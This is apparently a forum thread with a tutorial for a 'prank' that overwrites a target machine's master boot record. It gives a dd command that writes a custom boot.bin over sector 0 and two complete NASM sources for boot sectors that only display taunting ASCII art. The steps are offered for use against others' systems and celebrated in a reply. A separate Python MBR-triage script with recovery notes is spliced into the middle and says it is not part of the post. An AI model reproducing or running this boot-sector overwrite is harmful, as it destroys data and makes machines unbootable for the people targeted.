GreySec Forums

Full Version: [ASM] NoBOOT4U Prank
Note: This is a tutorial/boot loader written by me, originally from another forum, but I brought it here, so... yeah. I also used Damn Small Linux, which comes with a very unfitting background, so please ignore that.
I got bored and created a little boot loader in assembly language.
(You can learn the basics of it here)
And I decided why not make a little prank tutorial out of it...
The Warning: Keep in mind this "prank" can be extremely destructive to an HDD. And might make someone just about kill you. Also, I tested this on DSL (Damn Small Linux) in a virtual box; I suggest you do the same.
The Result: An un-bootable hard drive and a very upset user who now has to fix their MBR. Every time the user boots into that hard drive they can no longer get past anything but your taunting message.
The Prank:
Requirements...
  • A bin file designed to take up the first 512 bytes of a hard drive
  • root (big requirement, I know)
  • A way to download boot.bin to the computer
Let's get started..
Step 1
Log into the target system
[Image: bgIf0cE.png]
Step 2
Download the boot.bin file; I had mine on a local webserver
[Image: oanhdvn.png]
Step 3
Use dd (for Windows, use this) and enter the following
Code:
dd if=boot.bin of=/dev/hda bs=512 count=1
input file = boot.bin
output file = /dev/hda
bs = read up to 512 bytes
count = 1 iteration
/dev/hda is the main bootable hard drive (you'll have to figure this part out because it is most likely different on your system)
[Image: mNHafuF.png]
Step 4
Reboot!
[Image: nEY4OSG.png]
Step 5
Laugh when your sys admin cries..
[Image: IlSflb2.png]
Source Code for my boot.bin, make sure you compile with nasm
Code:
[BITS 16]
[ORG 0x7C00]
MOV SI, Msg
CALL OutStr
JMP $
OutChar:
 MOV AH, 0x0E
 MOV BH, 0x00
 MOV BL, 0x07
 INT 0x10
RET
OutStr:
 next_char:
 MOV AL, [SI]
 INC SI
 OR AL, AL
 JZ exit_function
 CALL OutChar
 JMP next_char
 exit_function:
RET
Msg db 0xA, 0xD, 0xA, 0xD
       db 'Hello from...', 0xA, 0xD, 0xA, 0xD
       db ' #     #  #####  #####   #######', 0xA, 0xD
       db ' #     #      #  #    #  # #   #', 0xA, 0xD
       db ' #######   ####  #    #  #  #  #', 0xA, 0xD
       db ' #     #      #  ####    #   # #', 0xA, 0xD
       db ' #     #  #####  #    #  #######', 0xA, 0xD
       db '                               ', 0xA, 0xD
       db '           [Good Bye]', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55
Alternate source code (With tea bagging!)
Code:
[BITS 16]
[ORG 0x7C00]
CALL Loop
JMP $
Loop:
 CALL Delay
 CALL Clear
 CALL FrameOne
 CALL Delay
 CALL Clear
 CALL FrameTwo
 CALL Loop
RET
Delay:
 mov bp, 2000
 mov si, 2000
 delay2:
   dec bp
   nop
   jnz delay2
   dec si
   cmp si,0    
   jnz delay2
RET
OutChar:
 MOV AH, 0x0E
 MOV BH, 0x00
 MOV BL, 0x07
 INT 0x10
RET
OutStr:
 next_char:
 MOV AL, [SI]
 INC SI
 OR AL, AL
 JZ exit_function
 CALL OutChar
 JMP next_char
 exit_function:
RET
Banner:
 MOV SI, Msg
 CALL OutStr
RET
FrameOne:
 CALL Banner
 MOV SI, Frame1
 CALL OutStr
RET
FrameTwo:
 CALL Banner
 MOV SI, Frame2
 CALL OutStr
RET
Clear:
 MOV AH,6
 MOV AL,50
 MOV BH,7
 MOV CH,0
 MOV CL,0
 MOV DH,24
 MOV DL,79
 INT 10H
RET
Msg db 0xA, 0xD, 0xA, 0xD
       db 'Greetings from...', 0xA, 0xD, 0xA, 0xD
       db ' ',0xB2,'     ',0xB2,'  ',0xB1,0xB2,0xDB,0xDB,0xDB,'  ',0xDB,0xB2,0xB2,0xB1,0xB1,'   ',0xB2,0xB2,0xB1,0xB2,0xDB,0xDB,0xDB, 0xA, 0xD
       db ' ',0xB2,'     ',0xB2,'      ',0xDB,'  ',0xDB,'    ',0xB1,'  ',0xB2,' ',0xB0,'   ',0xB2, 0xA, 0xD
       db ' ',0xDB,0xDB,0xDB,0xDB,0xB2,0xB1,0xB2,'   ',0xB0,0xB1,0xB2,0xDB,'  ',0xDB,'    ',0xB1,'  ',0xB2,'  ',0xB0,'  ',0xB2, 0xA, 0xD
       db ' ',0xDB,'     ',0xB2,'      ',0xDB,'  ',0xB2,0xB2,0xB1,0xB0,'    ',0xB2,'   ',0xB0,' ',0xB2, 0xA, 0xD
       db ' ',0xB2,'     ',0xB1,'  ',0xB0,0xB1,0xB2,0xDB,0xDB,'  ',0xB2,'    ',0xB0,'  ',0xB2,0xB2,0xB1,0xB2,0xDB,0xDB,0xB2, 0xA, 0xD
       db ' ',0xB1,'     ',0xB0,'                          ', 0xA, 0xD
       db ' ',0xB0,'           [Good Bye]', 0
Frame1 db 0xA, 0xD, 0xA, 0xD
      db '[ ] Rekt'
      db '  0 ', 0xA, 0xD
      db '         /@\', 0xA, 0xD
      db '         /"\', 0xA, 0xD
      db '        [you]', 0
Frame2 db 0xA, 0xD, 0xA, 0xD
      db '[x] Rekt'
      db '  o ', 0xA, 0xD
      db '         /@\', 0xA, 0xD
      db '         2"2', 0xA, 0xD
      db '        [you]', 0
TIMES 510 - ($ - $$) db 0
DW 0xAA55
Output:
[Image: Smk7njv.gif]
I hope you enjoy this and I'm not responsible for you getting beat up.
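From the recovery side: the Step 3 write replaces all 512 bytes of sector 0, so the partition table at offsets 446-509 is lost along with the boot code. The following is an added example, not part of the original post; its function names and sample sectors are constructed for illustration. It checks a saved copy of sector 0 for that condition and compares it with a baseline hash.

```python
import hashlib
import struct

TABLE_OFFSET = 446   # four 16-byte partition entries live at offsets 446-509
SIGNATURE = 0xAA55   # stored little-endian at offset 510
ENTRY = "<B3xB3xII"  # status, CHS (skipped), type, CHS (skipped), LBA start, sector count


def build_sample(code, entry=b""):
    """Constructed 512-byte sector: code, zero padding, optional entry, signature."""
    body = code.ljust(TABLE_OFFSET, b"\x00") + entry.ljust(64, b"\x00")
    return body + struct.pack("<H", SIGNATURE)


# Constructed samples, not captured from any real disk.
HEALTHY = build_sample(b"\xeb\xfe", struct.pack(ENTRY, 0x80, 0x83, 2048, 204800))
OVERWRITTEN = build_sample(b"\xeb\xfe[Good Bye]")


def parse_mbr(sector):
    """Return signature state, non-empty partition entries and the sector hash."""
    if len(sector) != 512:
        raise ValueError(f"expected 512 bytes, got {len(sector)}")
    (sig,) = struct.unpack_from("<H", sector, 510)
    partitions = []
    for i in range(4):
        status, ptype, lba, count = struct.unpack_from(ENTRY, sector, TABLE_OFFSET + 16 * i)
        if ptype != 0:  # type 0 marks an unused slot
            partitions.append({"index": i, "bootable": status == 0x80,
                               "type": ptype, "lba_start": lba, "sectors": count})
    return {"signature_ok": sig == SIGNATURE, "partitions": partitions,
            "sha256": hashlib.sha256(sector).hexdigest()}


def triage(sector, baseline_sha256=None):
    """List findings that suggest sector 0 was replaced."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("missing 0xAA55 boot signature")
    elif not info["partitions"]:
        # Heuristic: boots, but describes no partitions at all.
        findings.append("boot signature present but partition table empty")
    if baseline_sha256 and info["sha256"] != baseline_sha256:
        findings.append("sector differs from recorded baseline")
    return findings


if __name__ == "__main__":
    baseline = parse_mbr(HEALTHY)["sha256"]
    for name, img in (("healthy", HEALTHY), ("overwritten", OVERWRITTEN)):
        print(name, triage(img, baseline))
```

The baseline hash only helps if it was recorded before the incident, and a saved copy of the original sector also serves as the restore image. A legitimate boot loader update changes the hash too, so a mismatch is a prompt to inspect, not proof of tampering.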
Lmao, overriding the MBR is a pretty hardcore prank, the tea bagging ASCII character is a nice touch as well.
Getting root isn't hard at all (considering you have physical access that is), yea if I was that sysadmin I'd be so pissed XD